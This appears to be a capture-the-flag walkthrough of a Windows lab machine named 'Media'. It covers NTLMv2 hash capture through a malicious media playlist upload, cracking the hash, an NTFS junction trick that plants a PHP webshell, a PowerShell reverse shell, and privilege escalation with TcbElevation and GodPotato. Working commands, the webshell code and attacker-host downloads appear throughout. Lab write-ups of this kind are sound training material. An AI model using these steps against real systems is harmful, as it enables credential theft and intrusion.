Introduction
Media is a Windows machine running an Apache/XAMPP web stack with a custom PHP application. The site has a job application form that lets you upload a “video file” - which we weaponise to steal an NTLMv2 hash. The path to root:
- Enumeration → find a job application upload form on the web server
- NTLM hash capture → craft a malicious Windows Media Player file, upload it, capture the hash with Responder
- Crack the hash → recover
enox’s plaintext password, SSH in (user flag here) - Source code review → read
index.phpto understand how upload paths are generated - NTFS Junction attack → trick the upload handler into writing a PHP webshell into the Apache root
- Web shell → reverse shell → get a shell as
nt authority\local service - Privilege escalation → abuse
SeTcbPrivilegeto addenoxto Administrators - Root flag → SSH back in as
enox(now admin), readroot.txt
Key Concepts
What is NTLMv2? When Windows connects to a network resource (like an SMB share), it sends an authentication challenge-response called an NTLMv2 hash. This hash isn’t the actual password, but it can be captured by anyone who can get Windows to connect to them - and then cracked offline with a wordlist.
What is Responder? A tool that pretends to be various network services (SMB, HTTP, etc.) and logs every authentication attempt made to it. When a victim’s machine connects and tries to authenticate, Responder captures the NTLMv2 hash automatically.
What is XAMPP? A popular all-in-one web server package for Windows that bundles Apache, PHP, and MySQL. The web root is C:\xampp\htdocs\ - any PHP file placed there is executable via the browser.
What is an NTFS Junction? Windows NTFS (the file system) supports “junction points” - a type of directory symlink. You can make a folder appear to point somewhere else entirely. If an application creates files inside what it thinks is folder A, but folder A is actually a junction to folder B, the files end up in folder B. We use this to redirect the upload handler into writing to C:\xampp\htdocs\ instead.
What is SeTcbPrivilege? A powerful Windows privilege called “Act as part of the operating system.” It allows code to impersonate any user - including Administrator - without knowing their password. Service accounts sometimes have it, and it can be abused to run arbitrary commands in any user’s context.
What is SeImpersonatePrivilege? A slightly less powerful (but more common) Windows privilege that lets a process impersonate authenticated users. Service accounts like LOCAL SERVICE and NETWORK SERVICE often have this stripped, but a tool called FullPowers can restore it. Once you have it, “Potato” exploits (GodPotato, SweetPotato) can escalate you straight to SYSTEM.
Enumeration
Nmap
nmap -Pn -A --top-ports 3000 media.vlOpen ports:
| Port | Service | Notes |
|---|---|---|
| 22 | SSH (OpenSSH for Windows) | Our way in after cracking the hash |
| 80 | Apache 2.4.56 / PHP 8.1.17 | The target web app |
| 3389 | RDP | Not needed for this box |
The HTTP title is “ProMotion Studio” - a fictitious media/graphics company.
Web Application
Browsing to http://media.vl shows a hiring page with a form:
- First name, last name, email
- Upload field: “Upload a brief introduction video (compatible with Windows Media Player)”
Why does “Windows Media Player” matter? Windows Media Player (WMP) supports playlist file formats like
.waxand.asx. These files can contain remote URLs - and when WMP opens them, Windows automatically tries to authenticate to that URL over SMB. That authentication attempt leaks an NTLMv2 hash.
Foothold: NTLMv2 Hash Capture
Generate malicious WMP files
Clone the ntlm_theft tool and generate files pointing to your attacker IP:
git clone https://github.com/Greenwolf/ntlm_theft
python3 ntlm_theft.py -g all -s <YOUR_IP> -f mediaThis creates media/media.wax, media/media.asx, and media/media.m3u. The .wax and .asx formats work best - they open directly in WMP.
Start Responder
sudo responder -I tun0Responder will now listen for incoming SMB authentication attempts on your tun0 interface.
Upload the file
Fill in the form with any values and upload media.asx:
firstname: test
lastname: test
email: test@test.nullAfter a few seconds, Responder catches the hash:
[SMB] NTLMv2-SSP Username : MEDIA\enox
[SMB] NTLMv2-SSP Hash : enox::MEDIA:91b120fafb76f6b5:545C46A5...What happened? When someone on the server opened the uploaded file, Windows Media Player tried to stream the URL embedded in it - pointing at your machine. Windows automatically tried to authenticate over SMB, and Responder captured the NTLMv2 handshake.
Crack the hash
hashcat -a 0 enox_hash.txt rockyou.txtPassword: 1234virus@
SSH in
ssh enox@media.vl
# password: 1234virus@enox@MEDIA C:\Users\enox>✅ User flag captured. C:\Users\enox\Desktop\user.txt
Lateral Movement: NTFS Junction → Web Shell
Read the source code
As enox, list C:\ and spot the XAMPP install:
dir C:\Read the web app source:
type C:\xampp\htdocs\index.phpThe key lines from index.php:
$uploadDir = 'C:/Windows/Tasks/Uploads/'; // base upload directory
$folderName = md5($firstname . $lastname . $email);
$targetDir = $uploadDir . $folderName . '/';What does this tell us? The app stores every upload inside a subfolder of
C:\Windows\Tasks\Uploads\. The subfolder name is the MD5 hash of the three form fields. We already know our test values weretest,test,test@test.null- which produces the folder name317d52e7c825dd847d9c750a35547edc. We can verify this:echo -n testtesttest@test.null | md5sum # 317d52e7c825dd847d9c750a35547edc
Confirm on the target:
dir C:\Windows\Tasks\Uploads\
# d----- ... 317d52e7c825dd847d9c750a35547edcCheck Apache htdocs permissions:
icacls.exe C:\xampp\htdocs\
# NT AUTHORITY\LOCAL SERVICE:(I)(OI)(CI)(F)NT AUTHORITY\LOCAL SERVICE (the Apache service account) has Full Control over htdocs. Our current user (enox) has Full Control over the uploads folder. This is the pivot point.
Create the NTFS Junction
Remove the existing upload folder and replace it with a Junction that points to htdocs:
# PowerShell
Remove-Item C:\Windows\Tasks\Uploads\317d52e7c825dd847d9c750a35547edc\ -Recurse
New-Item -ItemType Junction -Path "C:\Windows\Tasks\Uploads\317d52e7c825dd847d9c750a35547edc" -Target "C:\xampp\htdocs"Or with cmd.exe:
mklink /J C:\Windows\Tasks\Uploads\317d52e7c825dd847d9c750a35547edc C:\xampp\htdocsWhat just happened? The upload folder name is now a junction point. When the PHP app writes a file to
C:\Windows\Tasks\Uploads\317d52e7c825dd847d9c750a35547edc\, it actually writes it toC:\xampp\htdocs\- directly into the Apache web root.
Create and upload the webshell
On your attacker machine, create cmd.php:
cat << EOF > cmd.php
<?php
system($_GET['cmd']);
?>
EOFNow re-submit the form with the same test/test/test@test.null values and upload cmd.php.
Verify RCE
curl http://media.vl/cmd.php?cmd=whoami
# nt authority\local serviceIt works. The webshell is live in the Apache root.
Get a reverse shell
Start a listener:
nc -lvnp 10001Trigger a PowerShell reverse shell via the webshell (use Revshells.com to generate a Base64 PowerShell payload for your IP/port):
curl "http://media.vl/cmd.php?cmd=powershell%20-e%20<BASE64_PAYLOAD>"PS C:\xampp\htdocs> whoami
nt authority\local servicePrivilege Escalation: SeTcbPrivilege → Administrator
Check privileges
whoami /privSeTcbPrivilege Act as part of the operating system DisabledSeTcbPrivilege is present (even though listed as “Disabled” - disabled just means it hasn’t been activated yet, not that it’s been removed).
What is SeTcbPrivilege? “Act as part of the operating system” is one of the most powerful Windows privileges. It allows code to create logon sessions for any user and run commands in their context - without knowing their password. There’s a public PoC called
TcbElevationthat exploits this to run an arbitrary command as SYSTEM.
Download and run TcbElevation
Serve the binary from your machine:
python3 -m http.server 8000On the target (as nt authority\local service):
iwr http://<YOUR_IP>:8000/TcbElevation-x64.exe -outfile TcbElevation-x64.exe
.\TcbElevation-x64.exe elevate 'net localgroup Administrators enox /add'Verify:
net localgroup Administrators
# Administrator
# enox ← added!SSH back in as enox (now admin)
ssh enox@media.vl
# password: 1234virus@enox@MEDIA C:\Users\enox> dir c:\users\administrator\desktop
# root.txt✅ Root flag captured. C:\Users\Administrator\Desktop\root.txt
Alternative Privilege Escalation: SeImpersonate → SYSTEM
If you prefer to escalate straight to SYSTEM instead of adding to Administrators, use this path from the nt authority\local service shell:
Restore SeImpersonatePrivilege with FullPowers
Service accounts often have SeImpersonatePrivilege stripped. FullPowers restores it by abusing a scheduled task trick:
iwr http://<YOUR_IP>:8000/FullPowers.exe -outfile FullPowers.exe
.\FullPowers.exeC:\Windows\system32> whoami /priv
# SeImpersonatePrivilege Impersonate a client after authentication EnabledPotato exploit → SYSTEM
With SeImpersonatePrivilege restored, use GodPotato to run a command as SYSTEM:
iwr http://<YOUR_IP>:8000/GodPotato-NET4.exe -outfile GodPotato-NET4.exe
.\GodPotato-NET4.exe -cmd 'powershell -e <BASE64_REVERSE_SHELL>'PS C:\xampp\htdocs> whoami
nt authority\systemWhat is a Potato exploit? A family of Windows privilege escalation exploits (
RottenPotato,JuicyPotato,SweetPotato,GodPotato) that all abuse theSeImpersonatePrivilegeright. They trick a high-privileged COM server into authenticating to a local pipe the attacker controls, then impersonate that token to spawn aSYSTEMprocess.
Summary
nmap → port 80 (Apache/PHP), port 22 (SSH)
↓
http://media.vl → job application form with WMP upload
↓
ntlm_theft → generate media.asx / media.wax
↓
Responder -I tun0 + upload media.asx
↓
NTLMv2 hash captured: MEDIA\enox
↓
hashcat + rockyou.txt → password: 1234virus@
↓
ssh enox@media.vl → USER FLAG
↓
type C:\xampp\htdocs\index.php → upload path = md5(firstname+lastname+email)
↓
echo -n testtesttest@test.null | md5sum → 317d52e7c825dd847d9c750a35547edc
↓
Remove upload folder → mklink /J <folder> C:\xampp\htdocs
↓
Re-upload cmd.php with same form values → lands in C:\xampp\htdocs\
↓
curl http://media.vl/cmd.php?cmd=whoami → nt authority\local service
↓
Trigger reverse shell via webshell
── Path A (SeTcbPrivilege) ──────────────────────────────
whoami /priv → SeTcbPrivilege present
TcbElevation-x64.exe elevate 'net localgroup Administrators enox /add'
ssh enox@media.vl → dir C:\Users\Administrator\Desktop → ROOT FLAG
── Path B (SeImpersonate / Potato) ──────────────────────
FullPowers.exe → restores SeImpersonatePrivilege
GodPotato-NET4.exe → reverse shell as nt authority\system → ROOT FLAGTools Used
| Tool | What it does | How to get it |
|---|---|---|
| ntlm_theft | Generates malicious files (WMP playlists, Office docs, etc.) that trigger NTLM auth | git clone https://github.com/Greenwolf/ntlm_theft |
| Responder | Listens for and captures NTLMv2 hashes over SMB/HTTP | Built into Kali; sudo responder -I tun0 |
| hashcat | GPU-accelerated password cracker | sudo apt install hashcat |
| TcbElevation | PoC that abuses SeTcbPrivilege to run commands as any user | github.com/antonioCoco/TcbElevation |
| FullPowers | Restores default privileges (SeImpersonate, SeAssignPrimaryToken) for service accounts | github.com/itm4n/FullPowers |
| GodPotato | Abuses SeImpersonatePrivilege to escalate to SYSTEM | github.com/BeichenDream/GodPotato |
| Revshells.com | Generates reverse shell payloads (PowerShell Base64, etc.) | revshells.com |
